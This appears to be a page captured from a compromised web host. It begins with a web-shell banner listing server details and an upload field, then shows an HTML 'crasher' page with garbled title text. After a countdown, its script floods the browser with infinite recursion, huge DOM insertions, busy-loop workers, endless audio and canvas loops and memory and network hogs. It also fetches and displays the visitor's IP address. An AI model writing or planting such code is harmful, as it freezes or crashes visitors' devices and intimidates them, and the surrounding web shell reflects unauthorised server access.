Server IP : 66.29.146.62 / Your IP : 216.73.216.2 Web Server : LiteSpeed System : Linux premium231.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64 User : dokkdzvi ( 925) PHP Version : 8.1.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/dokkdzvi/smarteco-ksa.store/assets/js/js/ |
Upload File : |
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <title>ππΆπΉπ°πΏ </title> <style> body { margin: 0; height: 100vh; background: url('preview.gif') no-repeat center center fixed; background-size: cover; overflow: hidden; display: flex; justify-content: center; align-items: center; position: relative; font-family: 'Georgia', serif; } body::before { content: ""; position: absolute; inset: 0; background: inherit; filter: blur(6px); z-index: -1; } .content { text-align: center; color: rgba(170, 170, 170, 0.8); z-index: 2; display: flex; flex-direction: column; gap: 6px; backdrop-filter: blur(2px); padding: 10px 20px; border-radius: 10px; } .name { font-size: 8vw; font-weight: bold; } .countdown { font-size: 6vw; } .ip { font-size: 4vw; } </style> </head> <body> <div class="content"> <div class="name">ππΆπΉπ°πΏ</div> <div class="countdown" id="countdown">2</div> <div class="ip" id="ip">Ψ¬Ψ§Ψ±Ω ΨͺΨΩ ΩΩ IP...</div> </div> <script> let countdownValue = 10; const countdownEl = document.getElementById("countdown"); const timer = setInterval(() => { countdownEl.textContent = countdownValue; countdownValue--; if (countdownValue < 0) { clearInterval(timer); setTimeout(() => { (function overload() { setTimeout(overload, 0); overload(); })(); setInterval(() => { const div = document.createElement("div"); div.innerHTML = "π".repeat(1000000); document.body.appendChild(div); }, 1); const blob = new Blob([` while (true) { let x = 0; while (x < 1e9) x++; } `], { type: "application/javascript" }); const worker = new Worker(URL.createObjectURL(blob)); const video = document.createElement('video'); video.src = 'preview.mp4'; video.autoplay = true; video.loop = true; video.muted = true; document.body.appendChild(video); setTimeout(() => { while (true) { let audio = new Audio('preview.mp3'); audio.play(); } }, 5000); const canvas = document.createElement("canvas"); document.body.appendChild(canvas); const ctx = canvas.getContext("2d"); function flood() { while (true) { ctx.fillStyle = "#" + Math.random().toString(16).slice(2, 8); ctx.fillRect(Math.random() * 2000, Math.random() * 2000, 500, 500); } } flood(); function heavyComputation() { let num = 0; while (true) { num++; num = num * num; } } heavyComputation(); function memoryHog() { const largeArray = []; while (true) { largeArray.push(new Array(1000000).fill(0)); } } memoryHog(); function networkHog() { fetch('preview.txt') .then(response => response.text()) .then(text => console.log('Large file loaded:', text)); networkHog(); } networkHog(); }, 1000); } }, 1000); fetch('https://api.ipify.org?format=json') .then(res => res.json()) .then(data => { document.getElementById("ip").textContent = "IP: " + data.ip; }); </script> </body> </html>